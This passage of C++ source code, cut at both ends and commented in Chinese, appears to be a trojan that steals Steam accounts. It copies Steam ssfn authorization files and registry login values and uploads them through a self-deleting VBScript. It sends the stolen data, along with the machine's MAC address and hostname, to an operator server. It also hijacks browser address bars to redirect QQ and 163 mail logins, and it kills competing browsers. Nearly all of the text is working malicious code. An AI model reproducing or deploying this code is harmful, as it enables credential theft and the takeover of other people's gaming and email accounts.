\r\n";myUploadVBS += "objFile.Position = 2 'delete UNICODE BOM \r\n";myUploadVBS += "ElseIf UCase(strCharset) = \"UTF-8\" Then \r\n";myUploadVBS += "objFile.Position = 3 'delete UTF-8 BOM \r\n";myUploadVBS += "End If \r\n";myUploadVBS += "StringToBytes = objFile.Read(-1) \r\n";myUploadVBS += "objFile.Close \r\n";myUploadVBS += "Set objFile = Nothing \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Function GetFileBinary(ByVal strPath) \r\n";myUploadVBS += "Dim objFile \r\n";myUploadVBS += "Set objFile = CreateObject(\"ADODB.Stream\") \r\n";myUploadVBS += "objFile.Type = adTypeBinary \r\n";myUploadVBS += "objFile.Open \r\n";myUploadVBS += "objFile.LoadFromFile strPath \r\n";myUploadVBS += "GetFileBinary = objFile.Read(-1) \r\n";myUploadVBS += "objFile.Close \r\n";myUploadVBS += "Set objFile = Nothing \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Function GetBoundary() \r\n";myUploadVBS += "Dim ret(12) \r\n";myUploadVBS += "Dim table \r\n";myUploadVBS += "Dim i \r\n";myUploadVBS += "table = \"abcdefghijklmnopqrstuvwxzy0123456789\" \r\n";myUploadVBS += "Randomize \r\n";myUploadVBS += "For i = 0 To UBound(ret) \r\n";myUploadVBS += "ret(i) = Mid(table, Int(Rnd() * Len(table) + 1), 1) \r\n";myUploadVBS += "Next \r\n";myUploadVBS += "GetBoundary = \"---------------------------\" & Join(ret, Empty) \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Property Let Charset(ByVal strValue) \r\n";myUploadVBS += "strCharset = strValue \r\n";myUploadVBS += "End Property \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Sub AddForm(ByVal strName, ByVal strValue) \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"\\r\\n\\r\\n$3\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$3\", strValue) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Sub AddFile(ByVal strName, ByVal strFileName, ByVal strFileType, ByVal strFilePath) \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1\\r\\nContent-Disposition: form-data; name=\"\"$2\"\"; filename=\"\"$3\"\"\\r\\nContent-Type: $4\\r\\n\\r\\n\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$2\", strName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$3\", strFileName) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$4\", strFileType) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "objTemp.Write GetFileBinary(strFilePath) \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Private Sub AddEnd() \r\n";myUploadVBS += "Dim tmp \r\n";myUploadVBS += "tmp = \"\\r\\n--$1--\\r\\n\" \r\n";myUploadVBS += "tmp = Replace(tmp, \"\\r\\n\", vbCrLf) \r\n";myUploadVBS += "tmp = Replace(tmp, \"$1\", strBoundary) \r\n";myUploadVBS += "objTemp.Write StringToBytes(tmp, strCharset) \r\n";myUploadVBS += "objTemp.Position = 2 \r\n";myUploadVBS += "End Sub \r\n";myUploadVBS += "\r\n";myUploadVBS += "Public Function Upload(ByVal strURL) \r\n";myUploadVBS += "Call AddEnd \r\n";myUploadVBS += "xmlHttp.Open \"POST\", strURL, False \r\n";myUploadVBS += "xmlHttp.setRequestHeader \"Content-Type\", \"multipart/form-data; boundary=\" & strBoundary \r\n";myUploadVBS += "xmlHttp.Send objTemp \r\n";myUploadVBS += "Upload = xmlHttp.responseText \r\n";myUploadVBS += "End Function \r\n";myUploadVBS += "End Class \r\n";myUploadVBS += "";myUploadVBS += "Dim UploadData \r\n";myUploadVBS += "Dim UploadState \r\n";myUploadVBS += "Set UploadData = New XMLUpload \r\n";myUploadVBS += "UploadData.Charset = \"utf-8\" \r\n";myUploadVBS += "UploadData.AddForm \"content\", \"Hello world\" \r\n";myUploadVBS += "UploadData.AddFile \"image\", \"%s\", \"text/txt\", \"c:/%s\" \r\n";myUploadVBS += "UploadState = UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";myUploadVBS += "If UploadState = \"FILES_UPLOAD_OK\" Then \r\n";myUploadVBS += "	\r\n";myUploadVBS += "Else \r\n";myUploadVBS += "	WScript.sleep 10000 \r\n";myUploadVBS += "	UploadData.Upload(\"%s?ID=%s&LP=%s\") \r\n";myUploadVBS += "End If \r\n";myUploadVBS += "Set UploadData = Nothing \r\n";myUploadVBS += "Set objFSO = CreateObject(\"Scripting.FileSystemObject\") \r\n";myUploadVBS += "objFSO.DeleteFile(\"c:/%s\") \r\n";myUploadVBS += "objFSO.DeleteFile(WScript.ScriptFullName) \r\n";myUploadVBS += "Set objFSO = Nothing \r\n";hFile = FindFirstFile(wildcardPathandFile, &pNextInfo);if(INVALID_HANDLE_VALUE == hFile){return FALSE;}if(pNextInfo.cFileName[0] != '.'){myVBSFilePath = "";myVBSFilePath += szMyselfPath;myVBSFilePath += GetName();myVBSFilePath += "64.VBS";mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);Sleep(1000);CString szUploadVBS = "";szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);FILE *fp;fp=fopen(myVBSFilePath, "w");if(fp){fprintf(fp, "%s", szUploadVBS.GetBuffer(0));}fclose(fp);Sleep(1000);ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);DeleteFile(mySSFNFiles);}while(FindNextFile(hFile, &pNextInfo)){if(pNextInfo.cFileName[0] == '.'){continue;}myVBSFilePath = "";myVBSFilePath += szMyselfPath;myVBSFilePath += GetName();myVBSFilePath += "64.VBS";mySSFNFilesName.Format(TEXT("%s.key"), pNextInfo.cFileName);mySSFNFiles.Format(TEXT("%s/%s"), wildcardPath, pNextInfo.cFileName);myTXTSSFNFiles.Format(TEXT("c:/%s.key"), pNextInfo.cFileName);//AfxMessageBox(mySSFNFiles);CopyFile(mySSFNFiles, myTXTSSFNFiles, FALSE);Sleep(1000);CString szUploadVBS = "";szUploadVBS.Format(TEXT(myUploadVBS), mySSFNFilesName, mySSFNFilesName, strMailServerName, szMailID, myLP, strMailServerName, szMailID, myLP, mySSFNFilesName);FILE *fp;fp=fopen(myVBSFilePath, "w");if(fp){fprintf(fp, "%s", szUploadVBS.GetBuffer(0));}fclose(fp);Sleep(1000);ShellExecute(NULL, "open", "cmd.exe", " /q /c "+myVBSFilePath, NULL, SW_HIDE);DeleteFile(mySSFNFiles);}return FALSE;
}// 数据发送模块BOOL DllExport SendURLPost(CString strPostStr)
{HMODULE hshell;hshell=LoadLibrary(_T("wininet.dll"));HINSTANCE (WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);HINSTANCE (WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);HINSTANCE (WINAPI *XXXInternetCloseHandle)(HINTERNET);(FARPROC&)XXXInternetOpen = GetProcAddress(hshell,"InternetOpenA");(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell,"InternetOpenUrlA");(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell,"InternetCloseHandle");HINTERNET hropen=XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);if( hropen == NULL ){FreeLibrary(hshell);return FALSE;}HINTERNET hropenurl = XXXInternetOpenUrl(hropen, strPostStr, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);if( hropenurl == NULL ){FreeLibrary(hshell);return FALSE;}XXXInternetCloseHandle(hropen);XXXInternetCloseHandle(hropenurl);FreeLibrary(hshell);return TRUE;
}// 劫持 IE 线程模块static DWORD WINAPI HOOKBrowser(LPVOID pParam)
{//AfxMessageBox("劫持 IE 线程模块启动!");do{CString szMyClass = "";HWND Hwnd_IEFrame = ::GetForegroundWindow();TCHAR szClassName[MAX_PATH]={0};ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_IEFrame, szClassName, MAX_PATH);szMyClass.Format(TEXT("%s"), szClassName);szMyClass.Replace(" ", "");if(szMyClass == "IEFrame"){//AfxMessageBox("IEFrame Class");HWND Hwnd_1 = ::FindWindowEx(Hwnd_IEFrame, NULL, _T("WorkerW"), NULL);if(Hwnd_1 != NULL){HWND Hwnd_2 = ::FindWindowEx(Hwnd_1, NULL, _T("ReBarWindow32"), NULL);if(Hwnd_2 != NULL){HWND Hwnd_3 = ::FindWindowEx(Hwnd_2, NULL, _T("Address Band Root"), NULL);if(Hwnd_3 != NULL){HWND Hwnd_4 = ::FindWindowEx(Hwnd_3, NULL, _T("ToolbarWindow32"), NULL);HWND Hwnd_5 = ::FindWindowEx(Hwnd_3, NULL, _T("Edit"), NULL);if(Hwnd_4 != NULL && Hwnd_5 != NULL){TCHAR szGetEditStr[MAX_PATH]={0};CString szMyEditStr1 = "", szMyEditStr2 = "";ZeroMemory(szGetEditStr, MAX_PATH * sizeof(TCHAR));::SendMessage(Hwnd_5, WM_GETTEXT, MAX_PATH, (LPARAM)szGetEditStr);//AfxMessageBox(szGetEditStr);szMyEditStr1.Format(_TEXT("%s"), szGetEditStr);szMyEditStr1.Replace("//", "`");AfxExtractSubString(szMyEditStr2, szMyEditStr1, 0, '/');szMyEditStr2.Replace("`", "//");CString szEditReplace;if( szMyEditStr2 == "http://mail.qq.com" || szMyEditStr2 == "https://mail.qq.com" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace = TEXT("https://ui.ptlogin2.qq.com/cgi-bin/login?style=9&appid=522005705&daid=4&s_url=https%3A%2F%2Fw.mail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwsk%26delegate_url%3D%26f%3Dxhtml%26target%3D&hln_css=http%3A%2F%2Fmail.qq.com%2Fzh_CN%2Fhtmledition%2Fimages%2Flogo%2Fqqmail%2Fqqmail_logo_default_200h.png&low_login=1&hln_autologin=%E8%AE%B0%E4%BD%8F%E7%99%BB%E5%BD%95%E7%8A%B6%E6%80%81&pt_no_onekey=1");char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else if( szMyEditStr2 == "https://mail.163.com" || szMyEditStr2 == "https://mail.126.com"  || szMyEditStr2 == "https://mail.yeah.net" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace.Format(TEXT("https://email.163.com/"));char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else if( szMyEditStr2 == "https://www.188.com" || szMyEditStr2 == "https://188.com" ){// 清理缓存//DelTempFiles();szMailAddr = "";szMailAddr = szMyEditStr2;szEditReplace.Format(TEXT("https://vip.188.com/webapp/login188.html"));char *szSetEditStr = szEditReplace.GetBuffer(szEditReplace.GetLength()+1);szEditReplace.ReleaseBuffer();::SendMessage(Hwnd_5, WM_SETTEXT, 255, (LPARAM)szSetEditStr);::SendMessage( Hwnd_5, WM_KEYDOWN, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_CHAR, ( WPARAM )( 13 ), 0x001f0001 );::SendMessage( Hwnd_5, WM_KEYUP, ( WPARAM )( 13 ), 0xc01f0001 );szBrowser = true;}else{szMailAddr = "";szMailAddr = szMyEditStr2;}}}}}}Sleep(100);} while( !szBrowser );return 0;
}// 锁定注册表默认浏览器 并 劫持非IE内核浏览器 线程模块static DWORD WINAPI HOOKIERegedit(LPVOID pParam)
{//AfxMessageBox("线程模块启动!");do{if( GetProcess("360se.exe") && GetProcess("steam.exe") ){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){goto myOtherFunction;}else{if( KillProcess("360se.exe") ){if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}}else if( GetProcess("360chrome.exe") && GetProcess("steam.exe") ){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){goto myOtherFunction;}else{if( KillProcess("360chrome.exe") ){if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}}else{goto myOtherFunction;}myOtherFunction:if( GetProcess("steam.exe") ){HWND Hwnd_Browser = ::GetForegroundWindow();TCHAR szClassName[MAX_PATH];ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Browser, szClassName, MAX_PATH);CString szMyClass = "";szMyClass.Format(TEXT("%s"), szClassName);int sz360Class = szMyClass.Find("360se6_Frame", 0);int szChromeClass = szMyClass.Find("WidgetWin_1", 0);int szChromeClass_WidgetWin = szMyClass.Find("Chrome_WidgetWin_1", 0);int szQQBrowserClass_WidgetWin = szMyClass.Find("QQBrowser_WidgetWin_0", 0);if( sz360Class >= 0 || szChromeClass_WidgetWin >= 0 || szChromeClass >= 0 || szQQBrowserClass_WidgetWin >= 0 ){DWORD processid;::GetWindowThreadProcessId(Hwnd_Browser, &processid);HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, processid);if(hprocess != NULL){CString myIEver = GetIEVerSion();int szIE_8 = myIEver.Find("8.0", 0);if( szIE_8 >= 0){DWORD cbNeededx = 0;HMODULE hModx = NULL;if( ::EnumProcessModules( hprocess, &hModx, sizeof( hModx ), &cbNeededx ) !=0 ){TCHAR myBrowserPath[MAX_PATH + 1] = {0};if( ::GetModuleFileNameEx( hprocess, hModx, myBrowserPath, MAX_PATH ) !=0 ){CString szBrowserPath;szBrowserPath.Format(TEXT(" /c \"%s\" https://w.mail.qq.com"), myBrowserPath);//AfxMessageBox("szBrowserPath:\n"+szBrowserPath);::TerminateProcess(hprocess, 0);ShellExecute(NULL, "open", "cmd.exe", szBrowserPath, "", SW_HIDE);}}}else{::TerminateProcess(hprocess, 0);if( GetProcess("QQ.exe") ){ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);}else{ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);}}szIERegedit = true;}::CloseHandle(hprocess);}}Sleep(100);} while( !szIERegedit );return 0;
}// 监控 Tslgame 主界面 线程模块static DWORD WINAPI HOOKGameMain(LPVOID pParam)
{//AfxMessageBox("监控 Tslgame 主界面 线程 已启动!");szTslgameEXE = FALSE;do{HWND Hwnd_Tslgame = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Tslgame, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass = szMySTClass.Find("UnrealWindow", 0);if( GetProcess("TslGame.exe") && isSTClass >= 0 ){//AfxMessageBox("窗口样式:" + szStyle1 + "\n扩展样式:" + szStyle2);//AfxMessageBox("已登录 Tslgame 主界面!");// 构建统计数据CString strPostData = "";strPostData.Format(TEXT("%scj.php?ID=%s&CJ=0"), strMailServerName, szMailID);//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){szTslgameEXE = true;}}}else{if( !GetProcess("steam.exe") ){szTslgameEXE = true;}}Sleep(100);} while( !szTslgameEXE );return 0;
}// 监控 Steam 主界面 线程模块static DWORD WINAPI HOOKLoginMain(LPVOID pParam)
{//AfxMessageBox("监控 steam.exe 主界面 线程 已启动!");BOOL szLoginEXE = FALSE;do{if( ::GetCurrentProcessId() == GetEXE() ){HWND Hwnd_Steam = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass1 = szMySTClass.Find("PopupWindow", 0);int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";szStyle1.Format(TEXT("%X"), lstyle1);szStyle2.Format(TEXT("%X"), lstyle2);szStyle3.Format(TEXT("%X"), lstyle3);szStyle4.Format(TEXT("%X"), lstyle4);if( (isSTClass2 >= 0 || isSTClass1 >= 0) && (szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") ){//AfxMessageBox("窗口样式:" + szStyle1 + "\n扩展样式:" + szStyle2);//AfxMessageBox("开始判断是否已登录Steam主界面!");///// 处理电脑授权文件CString mySTInstPath = "", mySTSSFNFilePath = "";HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );mySTInstPath.Format(TEXT("%s"), dw_data);mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);mySTInstPath.ReleaseBuffer();char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);mySTSSFNFilePath.ReleaseBuffer();//AfxMessageBox(mySTInstPath);//AfxMessageBox(mySTSSFNFilePath);SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);szTslgameEXE = true;Sleep(3000);DWORD dwThreadId4;CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); szBrowser = true;szLoginEXE = true;szEMailName = false;szIERegedit = true;}}else{if( !GetProcess("steam.exe") ){szBrowser = true;szLoginEXE = true;szEMailName = false;szIERegedit = true;}}Sleep(100);} while( !szLoginEXE );return 0;
}// 监控 登陆器界面 线程模块static DWORD WINAPI HOOKLoginEXE(LPVOID pParam)
{//AfxMessageBox("监控 steam.exe 登陆器 线程 已启动!");BOOL szLoginEXE = FALSE;do{if(::GetCurrentProcessId() == GetEXE()){HWND H_wnd = ::GetForegroundWindow();char sTitles[256];memset(sTitles, 0, 256);::SendMessage(H_wnd, WM_GETTEXT, 255, (LPARAM)sTitles);char *LP1;LP1 = strstr(sTitles, "Steam 令牌");char *LP2;LP2 = strstr(sTitles, "Steam  令牌");char *LP3;LP3 = strstr(sTitles, "Steam Guard");char *LP4;LP4 = strstr(sTitles, "Steam  Guard");char *LP5;LP5 = strstr(sTitles, "S t e a m 令牌");char *LP6;LP6 = strstr(sTitles, "S t e a m  令牌");char *LP7;LP7 = strstr(sTitles, "令牌");if( LP1 || LP2 || LP3 || LP4 || LP5 || LP6 || LP7 ){//AfxMessageBox("开始判断令牌种类!");long lstyle1 = GetWindowLong(H_wnd, GWL_STYLE);long lstyle2 = GetWindowLong(H_wnd, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(H_wnd, GWL_STYLE);long lstyle4 = GetWindowLongPtr(H_wnd, GWL_EXSTYLE);CString szLP1 = "", szLP2 = "", szLP3 = "", szLP4 = "";szLP1.Format(TEXT("%X"), lstyle1);szLP2.Format(TEXT("%X"), lstyle2);szLP3.Format(TEXT("%X"), lstyle3);szLP4.Format(TEXT("%X"), lstyle4);//AfxMessageBox("窗口样式:"+szLP1+"\n扩展样式:"+szLP2);if( szLP1 == "960A0000" || szLP1 == "96CA0000" || szLP3 == "960A0000" || szLP3 == "96CA0000" ){//AfxMessageBox("邮箱令牌");szLocalLP = "0";}else if( szLP1 == "960F0000" || szLP1 == "96CF0000" || szLP3 == "960F0000" || szLP3 == "96CF0000" ){//AfxMessageBox("手机令牌");szLocalLP = "1";}else{//AfxMessageBox("未知令牌");szLocalLP = "2";}HKEY hKey, xKey;LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char user[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;LONG lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)user, &dwLength );if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 ){CString LocalUser = "";CString ReadRegUser = "";LocalUser.Format(TEXT("%s"), user);ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet2 == ERROR_SUCCESS ){char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;LONG lRet3 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &dwType1, (LPBYTE)data1, &dwLength1 );LONG lRet4 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );LONG lRet5 = RegQueryValueEx( xKey, TEXT("AccSecond"), NULL, &dwType3, (LPBYTE)data3, &dwLength3 );LONG lRet6 = RegQueryValueEx( xKey, TEXT("DataSecond"), NULL, &dwType4, (LPBYTE)data4, &dwLength4 );if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) ){CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";szRegAccOne.Format(TEXT("%s"), data1);szRegDataOne.Format(TEXT("%s"), data2);szRegAccSecon.Format(TEXT("%s"), data3);szRegDataSecon.Format(TEXT("%s"), data4);/// 随机生成 16位 KEYtime_t seed = time(NULL); srand((unsigned)seed);int randNum = (rand()*2);CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";szMD5Key += "_CHWM_";int szMD5Key_Len = szMD5Key.GetLength();for(int j=szMD5Key_Len; j<16 ;j++){int randNum = rand()%26;if(j%2){szMD5.Format("%C", randNum+97);}else{szMD5.Format("%C", randNum+65);}szMD5Key += szMD5;Sleep(50);}szMD5Key = gen(szMD5Key);Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());/memset(osx, 0, MAX_PATH);memset(jsj, 0, MAX_PATH);// 获取计算机名WSADATA _wsaData = {0};int _Result = 0;_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}_Result = gethostname(jsj, sizeof(jsj));if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}WSACleanup();// 获取MACCString szMac = "";szMac = GetMacAddress();// 获取系统版本os();// 构建统计数据CString strPostData = "";strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), strServerName, szMac, osx, jsj, szVersion, strUserID, szRegAccOne, szRegDataOne, szRegAccSecon, szRegDataSecon, Base64_szMD5Key,szLocalLP);strPostData.Replace(" ", "%20");//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){//AfxMessageBox("成功发送数据!");FILE *fp;CFileFind finder1x;BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");if(!noEmpty1x){fp=fopen("C:\\NTUSERS.LOG", "w");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}else{fp=fopen("C:\\NTUSERS.LOG", "a");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}//隐藏数据文件SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;/*		邮箱令牌	*/if(szLocalLP == "0"){DeleteFile("C:\\MailData.txt");//创建劫持IE线程//szBrowser = false;//DWORD dwThreadId;//CreateThread(NULL, 0, HOOKBrowser, NULL, 0, &dwThreadId);//创建线程监控ST主界面myEmailSTR = "";DWORD dwThreadId2;CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId2); /*创	建锁定注册表默认浏览器与劫持非 IE 内核浏览器线	程*///DWORD dwThreadId3;//CreateThread(NULL, 0, HOOKIERegedit, NULL, 0, &dwThreadId3); }else if(szLocalLP == "2"){/*		未知令牌	*///创建线程监控ST主界面myEmailSTR = "";DWORD dwThreadId;CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId); }}else{//AfxMessageBox("发送数据失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}}}Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);}else{HWND Hwnd_Steam = ::GetForegroundWindow();TCHAR szSTClassName[MAX_PATH]={0};ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);CString szMySTClass = "";szMySTClass.Format(TEXT("%s"), szSTClassName);int isSTClass1 = szMySTClass.Find("PopupWindow", 0);int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";szStyle1.Format(TEXT("%X"), lstyle1);szStyle2.Format(TEXT("%X"), lstyle2);szStyle3.Format(TEXT("%X"), 